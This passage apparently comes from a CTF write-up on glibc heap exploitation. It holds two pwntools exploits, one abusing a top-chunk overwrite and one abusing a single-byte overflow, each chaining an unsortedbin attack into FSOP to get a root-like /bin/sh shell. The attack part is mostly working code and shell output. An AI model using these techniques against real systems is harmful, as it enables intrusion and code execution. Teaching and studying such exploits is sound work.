heap = int(proc.recvline(), 16)

proc.recvuntil(b"> ")
proc.timeout = 0.5

fake_vtable = flat(
    p64(0),
    p64(0),
    p64(0xcafebabe),
    p64(libc.sym.system),
)
fake_filep = flat(
    b"/bin/sh\x00", # _flags / old_top_chunk.prev_size
    p64(0x60 | 0b1), # _IO_read_ptr / old_top_chunk.size
    p64(0),
    p64(libc.sym._IO_list_all-0x10), # old_top_chunk.bk
    p64(1), # _IO_write_base
    p64(2), # _IO_write_ptr
    fake_vtable,
    b"\x00"*(0xc0-0x30-len(fake_vtable)),
    p32(0), # _mode
    b"\x00"*20,
    p64(heap+0x20+0x30), # vtable
)

# phase 1: turn top chunk into a small chunk and add it to the unsortedbin
malloc(0x20-8)
edit(b"A"*0x18 + p64((0x1000-0x20) | 0b001)) # clobber top chunk's size
malloc(0xfc0) # allocate a chunk large enough to brk a new top chunk and free the old one
# unsortedbin: [old_top_chunk, size: 0xfc0, fd: &main_arena.bins[0], bk: &main_arena.bins[0]]

# phase 3: fake _IO_FILE_plus with malicious vtable
edit(b"A"*0x10 + fake_filep)
# unsortedbin: [old_top_chunk, size: 0x61, fd: NULL, bk: &_IO_list_all-0x10]
# phase 2: unsortedbin attack to clobber _IO_list_all to point to fake _IO_FILE_plus
malloc(0x20-8) # old_top_chunk.bk->fd = &unsortedbin head, i.e. _IO_list_all = &main_arena.bins[0]-0x10; the corrupted bin then aborts malloc and fires the fake vtable

proc.sendline(b"id")
print(proc.recvline())
b'uid=1000(pwny) gid=100(users) groups=100(users),1(wheel)\n'

Challenge solve

There are two main differences from the previous challenge.

First, we can only allocate chunks of size 0x60, so the chunk we use for the unsortedbin attack is given a size field of 0x68 instead; it still sorts into the same 0x60 smallbin, but it dodges _int_malloc’s exact-fit fast path, which would hand the chunk straight back to us instead of binning it:

C
/* Take now instead of binning if exact fit */

if (size == nb)
{
    set_inuse_bit_at_offset (victim, size);
    if (av != &main_arena)
    victim->size |= NON_MAIN_ARENA;
    check_malloced_chunk (av, victim, nb);
    void *p = chunk2mem (victim);
    alloc_perturb (p, bytes);
    return p;
}

Second, instead of a very generous heap overflow we can only overflow the low byte of the next chunk’s size field (which also holds its flag bits). Instead of clobbering the top chunk’s size field like we did last time, we allocate two chunks next to each other, use the overflow to double the first chunk’s size, and free that enlarged chunk to put a 0xc0-sized chunk in the unsortedbin. Allocating another 0x60 chunk then splits it: the first half services the request and the 0x60 remainder stays in the unsortedbin, overlapping a chunk we still hold a pointer to. That gives us a UAF on the second chunk, which we can use to read the unsortedbin list pointers (leaking libc and heap addresses) and later to corrupt them for the FSOP attack.

Python
from pwn import *

context.log_level = 'warning'

elf = context.binary = ELF("one_byte")
libc = ELF(elf.runpath + b"/libc.so.6")

def calloc(size):
    if size != 0x58:
        raise Exception("size must be 0x58")
    proc.send(b"1")
    proc.recvuntil(b"> ")

def free(index):
    proc.send(b"2")
    proc.sendafter(b"index: ", f"{index}".encode())
    proc.recvuntil(b"> ")

def edit(index, data):
    if len(data) > 0x59:
        raise Exception("data cannot be larger than 0x59 bytes")
    proc.send(b"3")
    proc.sendafter(b"index: ", f"{index}".encode())
    proc.sendafter(b"data: ", data)
    proc.recvuntil(b"> ")

def read(index):
    proc.send(b"4")
    proc.sendafter(b"index: ", f"{index}".encode())
    ret = proc.recvline().strip()
    proc.recvuntil(b"> ")
    return ret

proc = remote("localhost", 1337)

proc.recvuntil(b"> ")
proc.timeout = 0.5


calloc(0x60-8) # chunk A
calloc(0x60-8) # chunk B
calloc(0x60-8) # chunk C
calloc(0x60-8) # chunk D
calloc(0x60-8) # chunk E
calloc(0x60-8) # chunk F
calloc(0x60-8) # chunk G
calloc(0x60-8) # chunk H; protects other chunks against consolidation with top chunk
edit(0, b"A"*0x58 + p8(0xc0 | 0b1)) # make chunk B completely overlap chunk C
edit(3, b"D"*0x58 + p8(0xc0 | 0b1)) # make chunk E overlap chunk F
free(1) # free chunk B
# unsortedbin: [chunk B (+ C), size: 0xc0, fd: &main_arena.top, bk: &main_arena.top]
calloc(0x60-8) # chunk I; service this request from the tail of the unsortedbin, causing it to be split in two
# unsortedbin: [chunk C, size: 0x60, fd: &main_arena.top, bk: &main_arena.top]

# leaks
libc.address = u64(read(2)[:8]) - (libc.sym.main_arena+0x58)
free(4)
# unsortedbin: [chunk E (+ F), size: 0xc0, fd: &chunk_c, bk: &main_arena.bins[0]-0x10] -> [chunk C, size: 0x60, fd: &main_arena.bins[0]-0x10, bk: &chunk_e]
heap = u64(read(2)[8:16]) - 0x180
calloc(0x60-8) # chunk J
# unsortedbin: [chunk E (+ F), size: 0xc0, fd: &main_arena.bins[0]-0x10, bk: &main_arena.bins[0]-0x10]
calloc(0x60-8) # chunk K
# unsortedbin: [chunk F, size: 0x60, fd: &main_arena.bins[0]-0x10, bk: &main_arena.bins[0]-0x10]

# construct fake file
fake_vtable = flat(
    p64(0),
    p64(0),
    p64(0xcafebabe),
    p64(libc.sym.system),
)
edit(10, b"K"*0x50 + b"/bin/sh\x00" + p8(0x68 | 0b1))
edit(5, flat(
    p64(0),
    p64(libc.sym._IO_list_all-0x10), # chunk_f.bk
    p64(1), # _IO_write_base
    p64(2), # _IO_write_ptr
    fake_vtable,
))
edit(6, flat(
    b"\x00"*(0xc0-8-0x68),
    p32(0), # _mode
))
edit(7, flat(
    b"\x00"*(20-0x8-4),
    p64(heap+0x210), # vtable
))
calloc(0x60-8) # chunk L; carry out unsortedbin attack

proc.sendline(b"id")
print(proc.recvline())
b'uid=1000(pwny) gid=100(users) groups=100(users),1(wheel)\n'